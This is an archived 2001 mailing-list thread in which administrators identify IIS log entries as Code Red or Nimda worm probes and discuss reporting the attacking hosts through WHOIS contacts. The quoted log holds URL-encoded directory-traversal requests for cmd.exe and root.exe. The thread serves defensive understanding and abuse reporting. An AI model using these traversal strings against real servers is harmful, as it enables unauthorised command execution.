I have been logging these attempts on our Outlook Web Access server. I then attempt a WHOIS lookup on the source ip. I then send a nicely worded email to any and all contacts that show up on the WHOIS search.
I have had some "success" with the contacts responding with thanks or reporting that the server had been taken off-line. I think we need to help each other out and report these attacks as we can. I hope that if any of our severs are "caught" doing these attacks that others would contact me regarding the "offense". All of this is time-consuming but IMHO worth it. Cheers, Mark -----Original Message----- From: Matt Hemingway [mailto:[EMAIL PROTECTED]] Sent: Monday, November 19, 2001 11:07 AM To: Ryan Ratkiewicz; [EMAIL PROTECTED] Subject: Re: IIS Hack Attempt Code Red. Code Blue. Nimda. Take your pick. -Matt On Thursday 15 November 2001 10:18, Ryan Ratkiewicz wrote: > Can someone help me decipher this? > > 11:30:48 207.217.205.149 GET /scripts/root.exe 404 > 11:30:48 207.217.205.149 GET /MSADC/root.exe 404 > 11:30:49 207.217.205.149 GET /c/winnt/system32/cmd.exe 404 11:30:49 > 207.217.205.149 GET /d/winnt/system32/cmd.exe 404 11:30:49 > 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500 > 11:30:49 207.217.205.149 GET > /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 11:30:50 > 207.217.205.149 GET > /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 11:30:50 > 207.217.205.149 GET > /msadc/..%5c../..%5c../..%5c/..Á ../..Á ../..Á ../winnt/system32/cmd.e > xe > 500 > 11:30:50 207.217.205.149 GET /scripts/..Á ../winnt/system32/cmd.exe 500 > 11:30:50 207.217.205.149 GET /scripts/winnt/system32/cmd.exe 404 > 11:30:51 207.217.205.149 GET /winnt/system32/cmd.exe 404 > 11:30:51 207.217.205.149 GET /winnt/system32/cmd.exe 404 > 11:30:51 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500 > 11:30:51 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500 > 11:30:52 207.217.205.149 GET /scripts/..%5c../winnt/system32/cmd.exe 500 > 11:30:52 207.217.205.149 GET /scripts/..%2f../winnt/system32/cmd.exe 500 > > Thanks. > >
